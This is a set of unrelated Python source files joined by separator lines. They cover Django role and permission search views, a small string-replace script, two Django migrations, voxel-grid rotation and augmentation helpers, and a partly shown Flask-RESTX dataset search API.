        # May be None when the request carries no 'q' parameter at all.
        self.query = view.request.GET.get('q')
        logging.basicConfig()
        self.logger = logging.getLogger('logger')

    def isActive(self):
        """Truthy when a non-empty query string was supplied."""
        # BUG FIX: len(None) raised TypeError when the request had no
        # 'q' parameter; a missing query now simply counts as inactive.
        return len(self.query) if self.query else 0

    def userFilter(self):
        return self.parseQuery()

    def roleFilter(self):
        return self.parseQuery(role=True)

    def userRoleFilter(self):
        return self.parseQuery(roleu=True)

    def permissionFilter(self):
        return self.parseQuery(permission=True)

    def permission2role(self):
        """Rewrite 'permission:X' terms into 'role:Y' terms for each role
        carrying permission X (mutates self.query in place)."""
        f = Q()
        if not self.query: return
        for term in self.query.split():
            term = term.strip()
            if term.startswith("permission:"):
                f = f | Q(permissions__permission_name=term[11:])# VS permission_name__icontains ?
                self.query = self.query.replace(term,"")
        if not len(f): return
        for r in Role.objects.filter(f): # roles for this permission
            self.query = self.query + " role:" + r.role_name
        #self.logger.warning("QueryParser permission2role " + str(q) + " --> " + str(self.query) + " filter " + str(f) )
        return

    def parseQuery(self, role=False, roleu=False, permission=False):
        """Build a Q filter from the query terms for the requested target:
        role (Role names), roleu (users via role), permission, or users."""
        f = Q()
        if not self.query: return f
        for term in self.query.split():
            term = term.strip()
            if role and term.startswith("role:"):
                f = f | Q(role_name__icontains=term[5:])
            elif roleu and term.startswith("role:"):
                f = f | Q(role__role_name=term[5:])
            elif permission and term.startswith("permission:"):
                f = f | Q(permission_name__icontains=term[11:])
            elif role or roleu or permission:
                # Target-specific mode: every other term is ignored.
                pass
            elif term.startswith("role:") or term.startswith("permission:"):
                # User mode: prefixed terms are handled by the other filters.
                pass
            elif term.startswith("first:"): f = f | Q(first_name__icontains=term[6:])
            elif term.startswith("last:"): f = f | Q(last_name__icontains=term[5:])
            elif term.startswith("acct:"): f = f | Q(acct_name__icontains=term[5:])
            else:
                f = f | Q(first_name__icontains=term) | Q(last_name__icontains=term) | Q(acct_name__icontains=term)
        self.logger.warning("QueryParser " + str(role) + str(roleu) + " " + str(permission) + " " + str(self.query) + " is " + str(f) )
        return f
#def index(request):
# return HttpResponse("Placeholder index for app <tt>priv</tt>")
class IndexView(TemplateView):
    """Render the static landing page."""
    template_name = 'index.html'
class SearchView(TemplateView):
    """Render the static search form page."""
    template_name = 'search.html'
class CheckView(TemplateView):
    """Renders the same template as SearchView; purpose unclear from this
    file -- presumably a separate URL entry point.  TODO confirm."""
    template_name = 'search.html'
class ResultsView(ListView):
    """List the users matching the search query."""
    model = User
    template_name = 'results.html'

    def get_queryset(self):
        parser = QueryParser(self)
        # Fold permission: terms into role: terms before filtering.
        parser.permission2role()
        object_list = User.objects.filter( parser.userFilter() ).filter( parser.userRoleFilter() ).order_by('acct_name').distinct()
        return object_list
class DetailView(DetailView): # or --> TemplateView
    """User detail page: the user's roles, the union of their
    permissions, and per-permission the roles granting it.

    NOTE(review): this class shadows the django DetailView name it
    inherits from; consider renaming it (URLconf update needed).
    """
    model = User
    template_name = 'detail.html'

    def get_context_data(self, **kwargs):
        context = super(DetailView,self).get_context_data(**kwargs)
        user_object = User.objects.filter(id=int(self.kwargs['pk']))[:1].get()
        u = user_object
        # Collect the union of permissions over all of the user's roles.
        u.perms = set()
        u.roles = Role.objects.filter(users__acct_name=u.acct_name)
        for r in u.roles:
            u.perms.update( r.permissions.all() )
        for p in u.perms:
            # Roles through which this user holds permission p.
            p.roles = u.roles.filter(permissions__permission_name=p.permission_name)
        context['permission_list'] = u.perms
        context['user_object'] = u
        return context
class RoleUserView(ListView):
    """Roles grouped with the users that match the query."""
    model = User
    template_name = 'role_user.html'

    def get_queryset(self):
        # The parser is stashed on the class so get_context_data can
        # reuse the same parsed query for this request.
        parser = RoleUserView.query = QueryParser(self)
        object_list = User.objects.filter(parser.userFilter()).order_by('acct_name').distinct()
        return object_list

    def get_context_data(self, **kwargs):
        parser = RoleUserView.query
        context = super(RoleUserView,self).get_context_data(**kwargs)
        roles = Role.objects.filter(parser.roleFilter())
        rm = Q()
        if parser.isActive():
            # With an active query, mark roles that have no matching
            # users so they can be excluded below.
            for r in roles:
                if not r.users.filter(parser.userFilter()).order_by('acct_name').distinct():
                    rm = rm | Q(id=r.id)
        roles = Role.objects.exclude(rm).filter(parser.roleFilter())
        for r in roles:
            r.users_list = r.users.filter(parser.userFilter()).order_by('acct_name').distinct()
        context['role_list'] = roles
        return context
class UserRoleView(ListView):
    """Users grouped with the roles that match the query."""
    model = User
    template_name = 'user_role.html'

    def get_queryset(self):
        # Parser stashed on the class for reuse in get_context_data.
        parser = UserRoleView.query = QueryParser(self)
        object_list = User.objects.filter(parser.userFilter()).order_by('acct_name').distinct()
        return object_list

    def get_context_data(self, **kwargs):
        context = super(UserRoleView,self).get_context_data(**kwargs)
        parser = UserRoleView.query
        # Fold permission: terms into role: terms before filtering.
        parser.permission2role()
        users = User.objects.filter(parser.userFilter()).filter(parser.userRoleFilter())
        for u in users:
            u.roles = Role.objects.filter(users__acct_name=u.acct_name).filter(parser.roleFilter())
        context['user_list'] = users
        return context
class UserPermissionView(ListView):
    """Users grouped with the permissions they hold through their roles."""
    model = User
    template_name = 'user_permission.html'

    def get_queryset(self):
        # Parser stashed on the class for reuse in get_context_data.
        parser = UserPermissionView.query = QueryParser(self)
        object_list = User.objects.filter(parser.userFilter()).order_by('acct_name').distinct()
        return object_list

    def get_context_data(self, **kwargs):
        context = super(UserPermissionView,self).get_context_data(**kwargs)
        parser = UserPermissionView.query
        parser.permission2role()
        users = User.objects.filter( parser.userFilter() ).filter(parser.userRoleFilter() )
        for u in users:
            # Union of matching permissions over all of the user's roles.
            u.perms = set()
            for r in Role.objects.filter(users__acct_name=u.acct_name):
                u.perms.update( r.permissions.filter(parser.permissionFilter()))
        context['user_list'] = users
        return context
class PermissionUserView(ListView):
    """Lists permissions with the users that hold each (permission -> users)."""
    model = User
    template_name = 'permission_user.html'
    def get_queryset(self):
        # Cache the parsed query on the class for reuse in get_context_data.
        parser = PermissionUserView.query = QueryParser(self)
        object_list = User.objects.filter(parser.userFilter()).order_by('acct_name').distinct()
        return object_list
    def get_context_data(self, **kwargs):
        parser = PermissionUserView.query
        context = super(PermissionUserView,self).get_context_data(**kwargs)
        perms = Permission.objects.filter(parser.permissionFilter())
        rm = Q()
        for p in perms:
            p.users = set()
            for r in Role.objects.filter(parser.roleFilter()).filter(permissions__permission_name=p.permission_name):
                p.users.update(r.users.filter(parser.userFilter()))
            # Bug fix: `parser.isActive` is a bound method and therefore always
            # truthy, so permissions with no users were pruned even when the
            # active filter was off.  Call it, as RoleUserView does.
            if parser.isActive() and not len(p.users):
                rm = rm | Q(id=p.id)
        perms = Permission.objects.exclude(rm).filter(parser.permissionFilter())
        # Re-attach the user sets on the final (possibly reduced) queryset.
        for p in perms:
            p.users = set()
            for r in Role.objects.filter(parser.roleFilter()).filter(permissions__permission_name=p.permission_name):
                p.users.update(r.users.filter(parser.userFilter()))
        context['permission_list'] = perms
        return context
class PermissionRoleView(ListView):
    """Lists permissions with the roles that grant each (permission -> roles)."""
    model = User
    template_name = 'permission_role.html'
    def get_queryset(self):
        # Cache the parsed query on the class for reuse in get_context_data.
        parser = PermissionRoleView.query = QueryParser(self)
        object_list = User.objects.filter(parser.userFilter()).order_by('acct_name').distinct()
        return object_list
    def get_context_data(self, **kwargs):
        context = super(PermissionRoleView,self).get_context_data(**kwargs)
        parser = PermissionRoleView.query
        perms = Permission.objects.filter(parser.permissionFilter())
        rm = Q()
        for p in perms:
            p.roles = Role.objects.filter(parser.roleFilter()).filter(permissions__permission_name=p.permission_name)
            # Bug fix: `parser.isActive` is a bound method and therefore always
            # truthy, so permissions with no roles were pruned even when the
            # active filter was off.  Call it, as RoleUserView does.
            if parser.isActive() and not p.roles:
                rm = rm | Q(id=p.id)
        perms = Permission.objects.exclude(rm).filter(parser.permissionFilter())
        # Re-attach the role querysets on the final (possibly reduced) queryset.
        for p in perms:
            p.roles = Role.objects.filter(parser.roleFilter()).filter(permissions__permission_name=p.permission_name)
        context['permission_list'] = perms
        return context
class RolePermissionView(ListView):
    """Lists roles with the permissions each grants (role -> permissions)."""
    model = User
    template_name = 'role_permission.html'
    def get_queryset(self):
        # Cache the parsed query on the class for reuse in get_context_data.
        parser = RolePermissionView.query = QueryParser(self)
        object_list = User.objects.filter(parser.userFilter()).order_by('acct_name').distinct()
        return object_list
    def get_context_data(self, **kwargs):
        context = super(RolePermissionView,self).get_context_data(**kwargs)
        parser = RolePermissionView.query
        roles = Role.objects.filter(parser.roleFilter())
        rm = Q()
        for r in roles:
            r.permissions_list = [ p.permission_name for p in r.permissions.filter(parser.permissionFilter()) ]
            # Bug fix: `parser.isActive` is a bound method and therefore always
            # truthy, so roles with no permissions were pruned even when the
            # active filter was off.  Call it, as RoleUserView does.
            if parser.isActive() and not len(r.permissions_list):
                rm = rm | Q(id=r.id)
        roles = Role.objects.exclude(rm).filter(parser.roleFilter())
        # Re-attach the permission-name lists on the final queryset.
        for r in roles:
            r.permissions_list = [ p.permission_name for p in r.permissions.filter(parser.permissionFilter()) ]
        context['role_list'] = roles
        return context
|
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys

# Usage: script.py <old> <new> <infile> <outfile>
# Copies <infile> to <outfile> with every occurrence of <old> replaced by
# <new>.  Fix: use context managers so both handles are closed deterministically
# (the original never closed the input file and relied on GC for the output).
with open(sys.argv[3], 'r') as src:
    data = src.read()
with open(sys.argv[4], 'w') as dst:
    dst.write(data.replace(sys.argv[1], sys.argv[2]))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2017-11-15 20:56
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Blog app migration: adds Contact, drops Comment, extends Post."""
    dependencies = [
        ('blog', '0003_post_image'),
    ]
    operations = [
        # New table for contact-form submissions.
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('email', models.EmailField(max_length=254)),
                ('phone', models.CharField(max_length=13, null=True)),
                ('message', models.TextField()),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
            ],
        ),
        # Drop the FK first so the Comment model can be deleted below.
        migrations.RemoveField(
            model_name='comment',
            name='post',
        ),
        # preserve_default=False: 'subtitle' is a one-off backfill value for
        # existing rows, not a lasting model default.
        migrations.AddField(
            model_name='post',
            name='subtitle',
            field=models.CharField(default='subtitle', max_length=200),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='post',
            name='image',
            field=models.FileField(default='images/tree.png', upload_to='images/'),
        ),
        migrations.DeleteModel(
            name='Comment',
        ),
    ]
|
# Generated by Django 3.1.1 on 2020-09-27 13:09
from django.db import migrations
class Migration(migrations.Migration):
    """Renames the database table backing `parliament1` to 'Parliament1'."""
    dependencies = [
        ('scrapingApp', '0008_auto_20200927_1604'),
    ]
    operations = [
        # Only db_table changes; the model's fields are untouched.
        migrations.AlterModelTable(
            name='parliament1',
            table='Parliament1',
        ),
    ]
|
import math
import random
import numpy as np
import scipy.ndimage
import torch
from typing import List
# Generating more training data by data augmentation
# N.B. explicit define the data type
# TODO: add them to another math subfolder
def isRotationMatrix(R):
    """Return True if R is numerically orthogonal, i.e. R^T R ~= I."""
    residual = np.identity(3, dtype=R.dtype) - np.dot(np.transpose(R), R)
    return np.linalg.norm(residual) < 1e-6
# rotation matrix to euler angles (unit: rad)
def rot2eul(R):
    """Convert a rotation matrix to Euler angles [x, y, z] in radians."""
    # Same orthogonality check as isRotationMatrix, inlined.
    residual = np.identity(3, dtype=R.dtype) - np.dot(np.transpose(R), R)
    assert np.linalg.norm(residual) < 1e-6
    cos_y = math.sqrt(R[0, 0] * R[0, 0] + R[1, 0] * R[1, 0])
    if cos_y < 1e-4:
        # Gimbal lock: z is not recoverable, pin it to 0.
        return np.array([math.atan2(-R[1, 2], R[1, 1]),
                         math.atan2(-R[2, 0], cos_y),
                         0])
    return np.array([math.atan2(R[2, 1], R[2, 2]),
                     math.atan2(-R[2, 0], cos_y),
                     math.atan2(R[1, 0], R[0, 0])])
# euler angles (unit: rad) to rotation matrix
def eul2rot(theta):
    """Euler angles [x, y, z] (radians) -> rotation matrix R = Rz*Ry*Rx."""
    cx, sx = np.cos(theta[0]), np.sin(theta[0])
    cy, sy = np.cos(theta[1]), np.sin(theta[1])
    cz, sz = np.cos(theta[2]), np.sin(theta[2])
    return np.array([
        [cy * cz, sx * sy * cz - sz * cx, sy * cx * cz + sx * sz],
        [sz * cy, sx * sy * sz + cx * cz, sy * sz * cx - sx * cz],
        [-sy,     sx * cy,                cx * cy],
    ])
def flip_rotmat(mat: np.array) -> np.array:
    """Return a "flipped" copy of a 3x3 matrix.

    Row 0 gets its y/z columns swapped; rows 1 and 2 are swapped with their
    y/z columns exchanged, with row 1 of the result negated.

    Bug fix: the original did ``fliped_mat = mat`` (an alias, not a copy), so
    every assignment also mutated ``mat`` and later reads saw already
    overwritten values -- e.g. ``mat[0, 1]`` was clobbered before being copied
    into ``fliped_mat[0, 2]``, breaking the swap.  Work on an explicit copy
    so the input is left untouched and all reads see the original values.
    """
    fliped_mat = mat.copy()
    fliped_mat[0, 1] = mat[0, 2]
    fliped_mat[0, 2] = mat[0, 1]
    fliped_mat[1, 0] = - mat[2, 0]
    fliped_mat[1, 1] = - mat[2, 2]
    fliped_mat[1, 2] = - mat[2, 1]
    fliped_mat[2, 0] = mat[1, 0]
    fliped_mat[2, 1] = mat[1, 2]
    fliped_mat[2, 2] = mat[1, 1]
    return fliped_mat
# generating random number
# 0,1,2,3 (axis)
def random_rotation() -> int:
    """Pick a random quarter-turn count in {0, 1, 2, 3}."""
    return np.random.randint(4)
# example -180 - 179
def random_degree(angle_min: int, angle_max: int) -> int:
    """Uniform random integer degree in [angle_min, angle_max)."""
    low, high = angle_min, angle_max
    return np.random.randint(low, high)
# 0 - 2pi
def random_angle() -> float:
    """Uniform random angle in [0, 2*pi) radians."""
    u = np.random.random()
    return u * 2 * math.pi
# [-4,4],[-4,4],[-4,4]
def random_jitter(max_jitter: int = 4) -> List[int]:
    """Three independent random offsets, each in [-max_jitter, max_jitter)."""
    offsets = []
    for _ in range(3):
        offsets.append(np.random.randint(-max_jitter, max_jitter))
    return offsets
# rotate around y axis (why y axis)
def get_rotations_y(angles: np.array) -> np.array:
    """One y-axis rotation matrix per angle; returns (len(angles), 3, 3) float32."""
    c, s = np.cos(angles), np.sin(angles)
    out = np.tile(np.eye(3)[np.newaxis, :], [angles.shape[0], 1, 1])
    out[:, 0, 0] = c
    out[:, 0, 2] = s
    out[:, 2, 0] = -s
    out[:, 2, 2] = c
    return out.astype(np.float32)
# z aixs is the first dimension (take care that now the dimension sequence is z,y,x)
def get_rotations_z(angles: np.array) -> np.array:
    """Per-angle rotation acting on dims 1-2 (z is the first grid dimension);
    returns (len(angles), 3, 3) float32."""
    c, s = np.cos(angles), np.sin(angles)
    out = np.tile(np.eye(3)[np.newaxis, :], [angles.shape[0], 1, 1])
    out[:, 1, 1] = c
    out[:, 1, 2] = s
    out[:, 2, 1] = -s
    out[:, 2, 2] = c
    return out.astype(np.float32)
def get_rotations_from_mat(mat: np.array, count) -> np.array:
    """Stack `count` copies of a 3x3 matrix into (count, 3, 3) float32."""
    stacked = np.tile(mat[np.newaxis, :], [count, 1, 1])
    return stacked.astype(np.float32)
def rotation_augmentation_fixed(grid: np.array, num_rotations=None) -> np.array:
    """Rotate grid by k quarter-turns in the (1, 3) axis plane; k is random
    in {0..3} when num_rotations is None."""
    k = np.random.randint(0, 4) if num_rotations is None else num_rotations
    return np.rot90(grid, k=k, axes=(1, 3))
def rotate_grid(grid: np.array, num_rotations: int) -> np.array:
    """Rotate grid by num_rotations * 90 degrees in the (1, 3) axis plane."""
    return np.rot90(grid, k=num_rotations, axes=(1, 3))
# used, figure out why this works (unit: degree)
# take the scan as the target, align models to the scan
def rotation_augmentation_interpolation_v3(grid: np.array, key: str, aug_rotation_z = None, pre_rot_mat = np.eye(3),
                          random_for_neg = False, pertub_for_pos = True, pertub_deg_max: int = 15) -> np.array:
    """Rotate a voxel grid about z, aligning model grids to the scan.

    grid: 4D voxel grid, rotated in the (2, 3) axis plane.
    key: role of the grid; "cad"/"negative"/"positive" get the alignment
        correction applied, other keys (e.g. the scan) only the augmentation.
    aug_rotation_z: shared augmentation angle in degrees.
    pre_rot_mat: alignment rotation matrix; only its z Euler angle is used.
    Positive samples additionally get a random +/- pertub_deg_max perturbation;
    negatives optionally get a fully random angle (random_for_neg).
    Returns the rotated grid with small interpolation values zeroed out.
    """
    # TODO: figure out which is better: rotate negative cad with the same angle or not (trun on/off by setting the argument random_for_neg)
    # False is better because we'd like to have harder negative samples
    if key == "positive" and pertub_for_pos: # also add this line for v5
        angle = aug_rotation_z + random_degree(-pertub_deg_max, pertub_deg_max) # unit: degree, -15 - 15
    elif key == "negative" and random_for_neg:
        angle = random_degree(0, 359) # unit: degree, 0 - 359
    else:
        angle = aug_rotation_z # unit: degree (the augmentation random rotation)
    euler_angle = rot2eul(pre_rot_mat) * 180.0 / math.pi # unit: degree (the alignment rotation)
    model_to_align = ["cad", "negative", "positive"]
    if key in model_to_align:
        #print("apply additional rotation:", angle*180/math.pi, euler_angle[2]*180/math.pi)
        # Fold the alignment z-angle (plus a 180 deg offset) into the rotation.
        angle = angle + 180.0 - euler_angle[2] # unit: degree
    if angle != 0:
        grid = scipy.ndimage.rotate(grid, angle, (2, 3), False, prefilter=True, order=3, cval=0, mode="nearest") # rotate in x-y plane, unit: degree
        # Suppress small interpolation artifacts introduced by cubic resampling.
        interpolate_thre = 0.5 # TODO: figure out what's the suitable value and the principle of the grid interpolation
        grid[grid<interpolate_thre] = 0
    return grid
# take the model as the target, align scan to the model at the canonical coordinate system
def rotation_augmentation_interpolation_v5(grid: np.array, key: str, aug_rotation_z = None, pre_rot_mat = np.eye(3), random_for_neg = False, pertub_for_pos = True) -> np.array:
    """Rotate a voxel grid about z, aligning the scan to the model (inverse of
    v3): "scan"/"mask" grids get the alignment correction, model grids only
    the augmentation angle.  random_for_neg / pertub_for_pos are accepted for
    signature parity with v3 but are not used here.  Returns the rotated grid.
    """
    angle = aug_rotation_z # unit: degree (the augmentation random rotation)
    euler_angle = rot2eul(pre_rot_mat) * 180.0 / math.pi # unit: degree (the alignment rotation)
    model_to_align = ["scan", "mask"]
    if key in model_to_align:
        #print("apply additional rotation:", angle*180/math.pi, euler_angle[2]*180/math.pi)
        # Opposite sign convention to v3: subtract 180 and add the z-angle.
        angle = angle - 180.0 + euler_angle[2] # unit: degree
    grid = scipy.ndimage.rotate(grid, angle, (2, 3), False, prefilter=True, order=3, cval=0, mode="nearest") # rotate in x-y plane, unit: degree
    # Unlike v3, interpolation values are intentionally not thresholded here.
    # interpolate_thre = 0.5 # TODO: figure out what's the suitable value and the principle of the grid interpolation
    # grid[grid<interpolate_thre] = 0
    return grid
# figure out why this does not work
def rotation_augmentation_interpolation_v4(grid: np.array, key: str, aug_rotation_z = None, pre_rot_mat = np.eye(3)) -> np.array:
    """Rotate a voxel grid via nearest-voxel index remapping (torch).

    Builds per-voxel grid coordinates, rotates them with a rotation matrix
    ("cad"/"negative" grids get pre_rot_mat composed in), clamps/rounds them
    back to integer indices and gathers -- i.e. nearest-neighbour resampling
    rather than interpolation.
    NOTE(review): `rots` is hard-coded to [0.0] (the aug_rotation_z line is
    commented out), so the augmentation angle is effectively ignored here --
    confirm whether that is intentional for this "does not work" variant.
    """
    if aug_rotation_z is None:
        aug_rotation_z = random_angle()
    scans = torch.from_numpy(np.expand_dims(grid, axis=0))
    num = scans.shape[0]
    # print(aug_rotation_z)
    #rots = np.asarray([aug_rotation_z])
    rots = np.asarray([0.0])
    #rotations_y = torch.from_numpy(get_rotations_y(rots))
    aug_rot_mat = get_rotations_z(rots)
    # Compose augmentation with the alignment rotation for model grids.
    total_rot = aug_rot_mat.dot(pre_rot_mat)
    model_to_rot = ["cad", "negative"]
    if key in model_to_rot:
        rot_mat = torch.from_numpy(total_rot).float()
        #rot_mat = torch.from_numpy(get_rotations_from_mat(pre_rot_mat.astype(np.float32),rots.shape[0]))
        #print(pre_rot_mat)
    else:
        rot_mat = torch.from_numpy(aug_rot_mat).float()
    # apply rotation and keep the voxel's structure
    max_size = np.array(scans.shape[2:], dtype=np.int32)
    # Coordinates are centered so the rotation pivots about the grid center.
    center = (max_size - 1).astype(np.float32) * 0.5
    center = np.tile(center.reshape(3, 1), [1, max_size[0] * max_size[1] * max_size[2]])
    grid_coords = np.array(
        np.unravel_index(np.arange(max_size[0] * max_size[1] * max_size[2]), [max_size[0], max_size[1], max_size[2]]),
        dtype=np.float32) - center
    grid_coords = np.tile(grid_coords[np.newaxis, :], [num, 1, 1])
    # get grid coordinates (decentralized) before rotation
    grid_coords = torch.from_numpy(grid_coords)
    center = torch.from_numpy(center).unsqueeze(0).repeat(scans.shape[0], 1, 1)
    #grid_coords = torch.bmm(rotations_y, grid_coords) + center
    grid_coords = torch.bmm(rot_mat, grid_coords) + center
    # Clamp to the valid index range, then flatten (z, y, x) -> linear index.
    grid_coords = torch.clamp(grid_coords, 0, max_size[0] - 1).long()
    grid_coords = grid_coords[:, 0] * max_size[1] * max_size[2] + grid_coords[:, 1] * max_size[2] + grid_coords[:, 2]
    mult = torch.arange(num).view(-1, 1) * max_size[0] * max_size[1] * max_size[2]
    grid_coords = grid_coords + mult
    grid_coords = grid_coords.long()
    # Gather source voxels at the rotated positions and restore (C, Z, Y, X).
    scan_rots = scans.permute(0, 2, 3, 4, 1).contiguous().view(-1, 1)[grid_coords]
    scan_rots = scan_rots.view(scans.shape[0], scans.shape[2], scans.shape[3], scans.shape[4], scans.shape[1]).permute(
        0, 4, 1, 2, 3)
    scan_rots = scan_rots.numpy()
    return scan_rots[0]
def rotation_augmentation_interpolation_v2(grid: np.array, rotation=None) -> np.array:
    """Rotate a voxel grid by `rotation` radians (random in [0, 2*pi) when
    None) via nearest-voxel index remapping with torch: voxel coordinates are
    centered, rotated with get_rotations_z, clamped back to valid indices and
    gathered.  Returns the rotated grid as a numpy array of the same shape.
    """
    if rotation is None:
        rotation = random_angle()
    scans = torch.from_numpy(np.expand_dims(grid, axis=0))
    num = scans.shape[0]
    rots = np.asarray([rotation])
    #rotations_y = torch.from_numpy(get_rotations_y(rots))
    rotations_z = torch.from_numpy(get_rotations_z(rots))
    max_size = np.array(scans.shape[2:], dtype=np.int32)
    # Coordinates are centered so the rotation pivots about the grid center.
    center = (max_size - 1).astype(np.float32) * 0.5
    center = np.tile(center.reshape(3, 1), [1, max_size[0] * max_size[1] * max_size[2]])
    grid_coords = np.array(
        np.unravel_index(np.arange(max_size[0] * max_size[1] * max_size[2]), [max_size[0], max_size[1], max_size[2]]),
        dtype=np.float32) - center
    grid_coords = np.tile(grid_coords[np.newaxis, :], [num, 1, 1])
    grid_coords = torch.from_numpy(grid_coords)
    center = torch.from_numpy(center).unsqueeze(0).repeat(scans.shape[0], 1, 1)
    #grid_coords = torch.bmm(rotations_y, grid_coords) + center
    grid_coords = torch.bmm(rotations_z, grid_coords) + center
    # Clamp to the valid index range, then flatten (z, y, x) -> linear index.
    grid_coords = torch.clamp(grid_coords, 0, max_size[0] - 1).long()
    grid_coords = grid_coords[:, 0] * max_size[1] * max_size[2] + grid_coords[:, 1] * max_size[2] + grid_coords[:, 2]
    mult = torch.arange(num).view(-1, 1) * max_size[0] * max_size[1] * max_size[2]
    grid_coords = grid_coords + mult
    grid_coords = grid_coords.long()
    # Gather source voxels at the rotated positions and restore (C, Z, Y, X).
    scan_rots = scans.permute(0, 2, 3, 4, 1).contiguous().view(-1, 1)[grid_coords]
    scan_rots = scan_rots.view(scans.shape[0], scans.shape[2], scans.shape[3], scans.shape[4], scans.shape[1]).permute(
        0, 4, 1, 2, 3)
    scan_rots = scan_rots.numpy()
    return scan_rots[0]
def rotation_augmentation_interpolation(grid: np.array, rotation=None) -> np.array:
    """Rotate `grid` by `rotation` degrees in the (1, 3) axis plane using
    cubic spline interpolation; pick a random angle when rotation is None.

    Bug fix: `random_degree()` was called with no arguments, but it requires
    explicit (angle_min, angle_max) bounds, so every call with rotation=None
    raised TypeError.  Use the full-circle range from random_degree's own
    doc comment ("example -180 - 179").
    """
    if rotation is None:
        angle = random_degree(-180, 180)
    else:
        angle = rotation
    grid = scipy.ndimage.rotate(grid, angle, (1, 3), False, prefilter=True, order=3, cval=0, mode="nearest")
    return grid
def flip_augmentation(grid: np.array, flip=None) -> np.array:
    """Mirror grid along axes (1, 3); 50/50 random choice when flip is None."""
    do_flip = (random.random() < 0.5) if flip is None else flip
    if do_flip:
        grid = np.flip(grid, (1, 3))
    return grid
def jitter_augmentation(grid: np.array, jitter=None) -> np.array:
    """Translate grid by `jitter` voxels per spatial axis (random when None),
    zero-padding the vacated region; output shape equals input shape."""
    if jitter is None:
        jitter = random_jitter()
    # Pad each spatial axis on the side the content moves toward...
    pad_before = [max(0, j) for j in jitter]
    pad_after = [max(0, -j) for j in jitter]
    padded = np.pad(grid,
                    ((0, 0),
                     (pad_before[0], pad_after[0]),
                     (pad_before[1], pad_after[1]),
                     (pad_before[2], pad_after[2])),
                    "constant", constant_values=(0, 0))
    # ...then crop back to the original extent from the opposite side.
    lo = [max(0, -j) for j in jitter]
    hi = [None if max(0, j) == 0 else -j for j in jitter]
    return padded[:, lo[0]:hi[0], lo[1]:hi[1], lo[2]:hi[2]]
|
import os,sys
from flask_restx import Namespace, Resource, fields
from flask import (request, current_app)
from glyds.document import get_one, get_many, get_many_text_search, get_ver_list, order_json_obj
from werkzeug.utils import secure_filename
from glyds.qc import run_qc
import datetime
import time
import subprocess
import json
import pytz
import hashlib
from glyds.db import get_mongodb
# Flask-RESTX namespace that groups every /dataset endpoint defined below.
api = Namespace("dataset", description="Dataset APIs")
# Request-body models, used with @api.expect for Swagger docs / validation.
dataset_getall_query_model = api.model(
    'Dataset Get All Query',
    {
    }
)
dataset_search_query_model = api.model(
    'Dataset Search Query',
    {
        'query': fields.String(required=True, default="", description='Query string')
    }
)
dataset_list_query_model = api.model(
    'Dataset List Query',
    {
        'list_id': fields.String(required=True, default="", description='List ID string')
    }
)
dataset_historylist_query_model = api.model(
    'Dataset History List Query',
    {
        'query': fields.String(required=True, default="", description='Query string')
    }
)
dataset_detail_query_model = api.model(
    'Dataset Detail Query',
    {
        'bcoid': fields.String(required=True, default="GLY_000001", description='BCO ID'),
        'dataversion': fields.String(required=False, default="1.12.1", description='Dataset Release [e.g: 1.12.1]'),
    }
)
dataset_upload_query_model = api.model(
    'Dataset Upload Query',
    {
        "format":fields.String(required=True, default="", description='File Format [csv/tsv]'),
        "qctype":fields.String(required=True, default="", description='QC Type [basic/single_glyco_site]'),
        "dataversion":fields.String(required=True, default="", description='Data Release [e.g: 1.12.1]')
    }
)
dataset_submit_query_model = api.model(
    'Dataset Submit Query',
    {
        'fname': fields.String(required=True, default="", description='First name'),
        'lname': fields.String(required=True, default="", description='Last name'),
        'email': fields.String(required=True, default="", description='Email address'),
        'affilation': fields.String(required=True, default="", description='Affilation')
    }
)
glycan_finder_query_model = api.model(
    'Glycan Finder Query',
    {
        'filename': fields.String(required=True, default="", description='File name')
    }
)
dataset_historydetail_query_model = api.model(
    'Dataset History Detail Query',
    {
        'bcoid': fields.String(required=True, default="GLY_000001", description='BCO ID')
    }
)
pagecn_query_model = api.model(
    'Dataset Page Query',
    {
        'pageid': fields.String(required=True, default="faq", description='Page ID')
    }
)
init_query_model = api.model(
    'Init Query',
    {
    }
)
# Response-shape model (currently only referenced from the commented-out
# @api.marshal_* decorators on the resources below).
ds_model = api.model('Dataset', {
    'id': fields.String(readonly=True, description='Unique dataset identifier'),
    'title': fields.String(required=True, description='Dataset title')
})
@api.route('/getall')
class DatasetGetAll(Resource):
    '''Return every dataset extract record.'''
    @api.doc('getall_datasets')
    @api.expect(dataset_getall_query_model)
    def post(self):
        '''Get all datasets'''
        req_obj = request.json  # parsed for parity with other endpoints (unused)
        result = get_many({"coll":"c_extract", "query":""})
        if "error" in result:
            return result
        records = result["recordlist"]
        return {
            "recordlist": records,
            "stats": {"total": len(records), "retrieved": len(records)},
        }
@api.route('/search')
class DatasetSearch(Resource):
    '''Full-text dataset search; results are cached and referenced by list_id.'''
    @api.doc('search_datasets')
    @api.expect(dataset_search_query_model)
    #@api.marshal_list_with(ds_model)
    def post(self):
        '''Search datasets'''
        req_obj = request.json
        mongo_dbh, error_obj = get_mongodb()
        if error_obj != {}:
            return error_obj
        # The MD5 of the request JSON doubles as cache key and list id.
        hash_str = json.dumps(req_obj)
        hash_obj = hashlib.md5(hash_str.encode('utf-8'))
        list_id = hash_obj.hexdigest()
        # NOTE(review): collection_names() is deprecated in newer pymongo
        # (use list_collection_names) -- confirm the pinned driver version.
        coll_names = mongo_dbh.collection_names()
        if "c_cache" in coll_names:
            res = get_one({"coll":"c_cache", "list_id":list_id})
            if "error" not in res:
                if "record" in res:
                    # Cache hit: the stored results are fetched via /list.
                    return {"list_id":list_id}
        res_obj = {"recordlist":[]}
        # All extract records: used directly for the empty-query case and as a
        # bcoid -> (filename, categories, title) lookup for body-search hits.
        r_one = get_many({"coll":"c_extract", "query":""})
        if "error" in r_one:
            return r_one
        bco_dict = {}
        for obj in r_one["recordlist"]:
            bco_dict[obj["bcoid"]] = {"filename":obj["filename"],"categories":obj["categories"],
                "title":obj["title"]
                }
        if req_obj["query"] == "":
            res_obj["recordlist"] = r_one["recordlist"]
        else:
            #dataset body search
            req_obj["coll"] = "c_records"
